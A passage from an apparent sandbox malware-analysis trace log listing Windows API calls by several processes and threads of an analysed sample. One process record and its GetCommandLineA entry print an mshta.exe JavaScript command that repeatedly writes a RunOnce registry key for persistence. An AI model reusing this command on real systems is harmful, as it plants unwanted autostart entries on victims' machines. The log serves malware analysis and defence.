out: hHeap=0x410000) returned 1 [0077.279] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.279] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x442b48 | out: hHeap=0x410000) returned 1 [0077.279] SetEvent (hEvent=0x150) returned 1 [0077.280] GetCurrentThreadId () returned 0x90 [0077.280] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1388) returned 0x0 [0077.280] GetExitCodeThread (in: hThread=0x12c, lpExitCode=0x2cfa04 | out: lpExitCode=0x2cfa04) returned 1 [0077.281] CActiveIMMAppEx_Trident:IUnknown:Release (This=0x445c90) returned 0x0 [0077.281] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.281] ReleaseActCtx (in: hActCtx=0x43e47c | out: hActCtx=0x43e47c) [0077.281] FreeLibrary (hLibModule=0x73710000) returned 1 [0077.281] FreeLibrary (hLibModule=0x73710000) returned 1 [0077.699] UnregisterClassW (lpClassName=0xc168, hInstance=0x74af0000) returned 1 [0077.699] UnregisterClassW (lpClassName=0xc16a, hInstance=0x74af0000) returned 1 [0077.699] OleUninitialize () [0077.699] DestroyWindow (hWnd=0x4015e) returned 1 [0077.699] NtdllDefWindowProc_W () returned 0x0 [0077.700] PostQuitMessage (nExitCode=0) [0077.701] DllCanUnloadNow () returned 0x1 [0077.701] DllCanUnloadNow () returned 0x1 [0078.038] GetProcAddress (hModule=0x77710000, lpProcName="UnregisterTraceGuids") returned 0x77c99286 [0078.038] EtwUnregisterTraceGuids () returned 0x0 [0078.038] GetProcAddress (hModule=0x77710000, lpProcName="UnregisterTraceGuids") returned 0x77c99286 [0078.038] EtwUnregisterTraceGuids () returned 0x0 [0078.038] ??3@YAXPAX@Z () returned 0x1 [0078.038] free (_Block=0x58d990) [0078.043] NtdllDefWindowProc_W () returned 0x0 [0078.043] FreeLibrary (hLibModule=0x74af0000) returned 1 [0078.043] GetCurrentThreadId () returned 0x90 [0078.043] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4334d8 | out: hHeap=0x410000) returned 1 [0078.043] DeleteObject (ho=0x80a0a6b) returned 1 [0078.043] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47dc30 | out: hHeap=0x410000) returned 1 [0078.043] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a5d0 | out: hHeap=0x410000) returned 1 [0078.043] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47e040 | out: hHeap=0x410000) returned 1 [0078.044] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47deb8 | out: hHeap=0x410000) returned 1 [0078.044] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d470 | out: hHeap=0x410000) returned 1 [0078.044] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42f490 | out: hHeap=0x410000) returned 1 [0078.044] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d210 | out: hHeap=0x410000) returned 1 [0078.044] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x445998 | out: hHeap=0x410000) returned 1 [0078.044] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44c930 | out: hHeap=0x410000) returned 1 [0078.044] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.044] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.044] DeleteObject (ho=0xe080283) returned 1 [0078.044] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d240 | out: hHeap=0x410000) returned 1 [0078.044] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d1b0 | out: hHeap=0x410000) returned 1 [0078.045] EtwUnregisterTraceGuids () returned 0x0 [0078.045] EtwUnregisterTraceGuids () returned 0x0 [0078.045] EtwEventUnregister () returned 0x0 [0078.045] EtwEventUnregister () returned 0x0 [0078.045] CloseHandle (hObject=0xbc) returned 1 [0078.045] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0078.045] CloseHandle (hObject=0xc0) returned 1 [0078.045] LocalFree (hMem=0x42ea38) returned 0x0 [0078.045] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.045] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.045] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.045] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.045] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.045] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.045] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.045] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.046] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.046] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x435358 | out: hHeap=0x410000) returned 1 [0078.046] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.046] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.046] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.046] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.046] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0078.046] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42e830 | out: hHeap=0x410000) returned 1 [0078.046] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x423de0 | out: hHeap=0x410000) returned 1 [0078.046] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42ea78 | out: hHeap=0x410000) returned 1 [0078.046] FreeLibrary (hLibModule=0x76e40000) returned 1 [0078.046] FreeLibrary (hLibModule=0x75300000) returned 1 [0078.046] free (_Block=0x582640) [0078.064] GetModuleHandleA (lpModuleName="mscoree.dll") returned 0x0 [0078.064] ExitProcess (uExitCode=0x0) Thread: id = 20 os_tid = 0x8fc Thread: id = 23 os_tid = 0x94c [0067.789] GetCurrentThreadId () returned 0x94c [0067.790] LoadLibraryW (lpLibFileName="mshtml.dll") returned 0x74af0000 [0067.790] CoInitialize (pvReserved=0x0) returned 0x0 [0067.790] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x927c0) returned 0x0 [0074.814] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1006) returned 0x4790c0 [0074.814] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4613b0 [0074.814] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x16) returned 0x46fdc8 [0074.815] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x4790c0, cbMultiByte=8, lpWideCharStr=0x46fdcc, cchWideChar=8 | out: lpWideCharStr="4475597") returned 8 [0074.815] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x108) returned 0x47a0d0 [0074.815] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x927c0) returned 0x0 [0074.816] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x927c0) returned 0x0 [0077.279] CoUninitialize () [0077.279] FreeLibraryAndExitThread (hLibModule=0x74af0000, dwExitCode=0x0) [0077.280] GetCurrentThreadId () returned 0x94c Thread: id = 26 os_tid = 0x97c [0069.264] GetCurrentThreadId () returned 0x97c Thread: id = 27 os_tid = 0x98c [0069.712] GetCurrentThreadId () returned 0x98c Thread: id = 28 os_tid = 0x99c [0069.712] GetCurrentThreadId () returned 0x99c Process: id = "7" image_name = "mshta.exe" filename = "c:\\windows\\syswow64\\mshta.exe" page_root = "0x4725f000" os_pid = "0x7bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x620" cmd_line = "mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 15 os_tid = 0x544 [0060.500] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x33f97c | out: lpSystemTimeAsFileTime=0x33f97c*(dwLowDateTime=0xee274da0, dwHighDateTime=0x1d61645)) [0060.500] GetCurrentProcessId () returned 0x7bc [0060.500] GetCurrentThreadId () returned 0x544 [0060.500] GetTickCount () returned 0x1147a3f [0060.500] QueryPerformanceCounter (in: lpPerformanceCount=0x33f974 | out: lpPerformanceCount=0x33f974*=18085484062) returned 1 [0060.500] GetModuleHandleA (lpModuleName=0x0) returned 0x970000 [0060.500] GetStartupInfoA (in: lpStartupInfo=0x33f888 | out: lpStartupInfo=0x33f888*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0060.500] GetVersionExA (in: lpVersionInformation=0x33f8d8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x33f8d8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0060.501] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x200000 [0060.501] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0060.501] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0060.501] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0060.501] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0060.501] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0060.502] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.502] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.502] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.502] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.502] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.502] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.502] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.502] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.503] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.503] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.503] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.503] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.503] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.503] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.503] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.503] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.503] GetModuleHandleW (lpModuleName="kernelbase.dll") returned 0x76c10000 [0060.504] GetProcAddress (hModule=0x76c10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c2004f [0060.504] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.504] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.583] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.583] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.583] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.583] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.583] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.583] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.584] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.584] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.584] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.584] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.584] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.584] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.584] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.584] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.585] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.585] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.585] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.585] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.585] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.585] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.585] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.585] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.586] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.586] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.586] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.586] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.586] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.586] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.587] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x214) returned 0x2007d0 [0060.587] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.587] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.587] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.587] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.587] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.587] GetStartupInfoA (in: lpStartupInfo=0x33f80c | out: lpStartupInfo=0x33f80c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0060.587] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x480) returned 0x2009f0 [0060.587] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0060.587] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0060.587] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0060.588] SetHandleCount (uNumber=0x20) returned 0x20 [0060.588] GetCommandLineA () returned="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"" [0060.588] GetEnvironmentStringsW () returned 0x7703b8* [0060.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0060.588] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x0, Size=0x565) returned 0x200e78 [0060.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x200e78, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0060.588] FreeEnvironmentStringsW (penv=0x7703b8) returned 1 [0060.588] GetLastError () returned 0x0 [0060.588] SetLastError (dwErrCode=0x0) [0060.588] GetLastError () returned 0x0 [0060.588] SetLastError (dwErrCode=0x0) [0060.588] GetLastError () returned 0x0 [0060.588] SetLastError (dwErrCode=0x0) [0060.588] GetACP () returned 0x4e4 [0060.589] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x0, Size=0x220) returned 0x2013e8 [0060.589] GetLastError () returned 0x0 [0060.589] SetLastError (dwErrCode=0x0) [0060.589] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x33f7e4 | out: lpCPInfo=0x33f7e4) returned 1 [0060.589] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x33f2b0 | out: lpCPInfo=0x33f2b0) returned 1 [0060.589] GetLastError () returned 0x0 [0060.589] SetLastError (dwErrCode=0x0) [0060.589] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x33f240 | out: lpCharType=0x33f240) returned 1 [0060.589] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x33f6c4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0060.589] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x33f6c4, cbMultiByte=256, lpWideCharStr=0x33f028, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0060.589] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x33f2c4 | out: lpCharType=0x33f2c4) returned 1 [0060.589] GetLastError () returned 0x0 [0060.589] SetLastError (dwErrCode=0x0) [0060.589] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0060.589] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x33f6c4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0060.589] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x33f6c4, cbMultiByte=256, lpWideCharStr=0x33efc8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿʱ?溂\x97䜤?Ā") returned 256 [0060.589] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿʱ?溂\x97䜤?Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0060.589] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿʱ?溂\x97䜤?Ā", cchSrc=256, lpDestStr=0x33edb8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0060.589] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x33f5c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿðB,Ûü÷3", lpUsedDefaultChar=0x0) returned 256 [0060.590] GetLastError () returned 0x0 [0060.590] SetLastError (dwErrCode=0x0) [0060.590] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x33f6c4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0060.590] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x33f6c4, cbMultiByte=256, lpWideCharStr=0x33efe8, cchWideChar=256 | out: lpWideCharStr=" 